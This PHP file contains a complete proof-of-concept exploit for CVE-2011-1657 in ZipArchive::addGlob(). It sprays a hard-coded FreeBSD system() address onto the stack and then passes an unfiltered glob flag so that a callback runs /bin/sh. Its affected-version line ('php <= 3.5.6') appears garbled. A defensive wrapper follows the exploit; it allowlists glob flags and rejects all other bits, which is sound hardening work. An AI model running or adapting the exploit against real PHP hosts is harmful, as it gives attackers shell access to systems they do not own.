<?php
/* CVE-2011-1657: php <= 3.5.6 ZipArchive::addGlob() missing glob flags filtering
 *
 * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
 *
 * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
 */

/* Create a file for our md5_file() stack spray. */
$system_addr = "\x50\x78\x8d\x28"; /* FreeBSD 8.2-RELEASE system() libc addr */
$own = fopen("owned", "w");
fwrite($own, str_repeat($system_addr, 4096 / 4));
fclose($own);

/* Fake zip, empty file is a valid zip. */
$path = "foo.zip";
@unlink($path);
fclose(fopen($path, "a"));
$nx = new ZipArchive();
$nx->open($path);

/* Lame stack spraying \o/ */
md5_file("owned");

/* Bing. globbuf.gl_opendir() = system() */
$nx->addGlob("/bin/sh", 64);
?>
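The root cause above is that the `$flags` argument reaches glob() unfiltered, so an application that passes a caller-controlled integer can enable flags that alter glob()'s internals rather than its matching behaviour. The following wrapper is an added hardening example (not part of the paste) for PHP code that must call ZipArchive::addGlob() with flags taken from untrusted input: it builds an allowlist from the matching-behaviour constants PHP exposes and fails closed on any other bit. `zipAddGlobSafe` and the archive name are assumed names; the constructed value `1 << 20` stands in for an arbitrary unexpected flag.

```php
<?php
/* Added example: allowlist filter in front of ZipArchive::addGlob().
 * Only flags that change how patterns match are permitted; anything else
 * (including platform-specific extension flags) is rejected before glob()
 * ever sees it. The mask is built from constant names because the numeric
 * values of glob() flags differ between libc implementations. */
function zipAddGlobSafe(ZipArchive $zip, $pattern, $flags = 0, array $options = array())
{
    $safeNames = array('GLOB_MARK', 'GLOB_NOSORT', 'GLOB_NOCHECK',
                       'GLOB_NOESCAPE', 'GLOB_ERR', 'GLOB_ONLYDIR', 'GLOB_BRACE');
    $allowed = 0;
    foreach ($safeNames as $name) {
        if (defined($name)) {            /* GLOB_BRACE is absent on some libcs */
            $allowed |= constant($name);
        }
    }

    $rejected = ((int) $flags) & ~$allowed;
    if ($rejected !== 0) {
        /* Fail closed; report exactly which bits were refused so the
         * event can be logged and investigated. */
        throw new InvalidArgumentException(sprintf(
            'addGlob(): glob flag bits 0x%x are not permitted', $rejected));
    }
    return $zip->addGlob($pattern, $flags, $options);
}

$zip = new ZipArchive();
$zip->open('example_archive.zip', ZipArchive::CREATE);   /* assumed file name */

/* Legitimate call: matching-only flags pass through unchanged. */
zipAddGlobSafe($zip, '*.txt', GLOB_NOSORT,
               array('add_path' => 'docs/', 'remove_all_path' => true));

/* Constructed untrusted value (e.g. from a request parameter): rejected. */
$untrustedFlags = 1 << 20;
try {
    zipAddGlobSafe($zip, '*.txt', $untrustedFlags);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
$zip->close();
```

Keeping the allowlist in terms of constant names rather than literal numbers is deliberate: the same integer can mean GLOB_NOESCAPE on one libc and an internals-altering flag on another.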